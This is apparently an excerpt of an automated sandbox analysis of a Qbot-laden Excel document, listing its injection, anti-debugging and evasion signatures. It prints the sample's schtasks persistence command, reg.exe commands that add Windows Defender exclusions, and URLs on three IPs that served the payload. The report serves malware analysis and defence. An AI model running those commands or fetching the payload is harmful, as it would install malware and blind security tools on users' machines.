Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DB0AEF6 FindFirstFileW,FindNextFileW, 15_2_6DB0AEF6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0008AEF6 FindFirstFileW,FindNextFileW, 16_2_0008AEF6

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E015F63 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 4_2_6E015F63
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01DFEF LoadLibraryA,GetProcAddress, 4_2_6E01DFEF
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B96F mov eax, dword ptr fs:[00000030h] 4_2_6E11B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B843 mov eax, dword ptr fs:[00000030h] 4_2_6E11B843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E11B54E push dword ptr fs:[00000030h] 4_2_6E11B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B96F mov eax, dword ptr fs:[00000030h] 6_2_6DF6B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B54E push dword ptr fs:[00000030h] 6_2_6DF6B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6DF6B843 mov eax, dword ptr fs:[00000030h] 6_2_6DF6B843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB96F mov eax, dword ptr fs:[00000030h] 12_2_6DDBB96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB54E push dword ptr fs:[00000030h] 12_2_6DDBB54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6DDBB843 mov eax, dword ptr fs:[00000030h] 12_2_6DDBB843
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B96F mov eax, dword ptr fs:[00000030h] 15_2_6DC0B96F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B54E push dword ptr fs:[00000030h] 15_2_6DC0B54E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 15_2_6DC0B843 mov eax, dword ptr fs:[00000030h] 15_2_6DC0B843
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_00085A54 RtlAddVectoredExceptionHandler, 7_2_00085A54

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: B0000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 130000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 80000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 9C102D Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 130000 protect: page read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: 80000 protect: page read and write Jump to behavior
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 1136 base: 9C102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: B0000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 572 base: 9C102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 130000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2536 base: 9C102D value: E9 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 80000 value: 9C Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2576 base: 9C102D value: E9 Jump to behavior
Yara detected hidden Macro 4.0 in Excel
Source: Yara match File source: Document_748968552-10062021.xls, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kzlufjnad /tr 'regsvr32.exe -s \'C:\Users\user\Celod.wac\'' /SC ONCE /Z /ST 16:57 /ET 17:09 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Celod.wac2 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Fmjlcuic' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Adbwawqor' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Celod.wac' Jump to behavior
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000007.00000002.877913159.0000000000C70000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Code function: 7_2_000831B5 CreateNamedPipeA, 7_2_000831B5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E0197ED GetSystemTimeAsFileTime, 4_2_6E0197ED
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_6E01D061 GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 4_2_6E01D061

Stealing of Sensitive Information:

barindex
Yara detected Qbot
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.regsvr32.exe.6db00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.regsvr32.exe.6dcb0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.6e010000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.6de60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.561069435.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.485516725.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.877678866.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.583660617.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.877666788.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.579711370.0000000000770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.639603289.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.645193713.00000000000D0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Qbot
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.regsvr32.exe.1b339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.regsvr32.exe.6db00000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.regsvr32.exe.6dcb0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.6e010000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorer.exe.100000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1f339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.explorer.exe.80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.explorer.exe.d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.3.regsvr32.exe.1d339d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.regsvr32.exe.78339d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.6de60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.561069435.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.485516725.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.877678866.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.583660617.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.877666788.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.579711370.0000000000770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.639603289.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.645193713.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 498107 Sample: Document_748968552-10062021.xls Startdate: 06/10/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Yara detected Qbot 2->75 77 6 other signatures 2->77 9 EXCEL.EXE 194 38 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 190.14.37.107, 49165, 80 OffshoreRacksSAPA Panama 9->65 67 188.165.62.50, 49167, 80 OVHFR France 9->67 69 94.140.114.111, 49166, 80 NANO-ASLV Latvia 9->69 55 C:\Users\user\...\44475.7050777778[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44475.7050777778[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44475.7050777778[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        42 explorer.exe 32->42         started        101 Allocates memory in foreign processes 34->101 103 Maps a DLL or memory area into another process 34->103 45 explorer.exe 34->45         started        53 C:\Users\user\Celod.wac, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Celod.wac1, PE32 42->61 dropped 63 C:\Users\user\Celod.wac2, PE32 45->63 dropped signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
94.140.114.111
 unknown Latvia
43513 NANO-ASLV false
190.14.37.107
 unknown Panama
52469 OffshoreRacksSAPA false
188.165.62.50
 unknown France
16276 OVHFR false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://188.165.62.50/44475.7050777778.dat false
  • Avira URL Cloud: safe
 unknown
http://190.14.37.107/44475.7050777778.dat false
  • Avira URL Cloud: safe
 unknown
http://94.140.114.111/44475.7050777778.dat false
  • Avira URL Cloud: safe
 unknown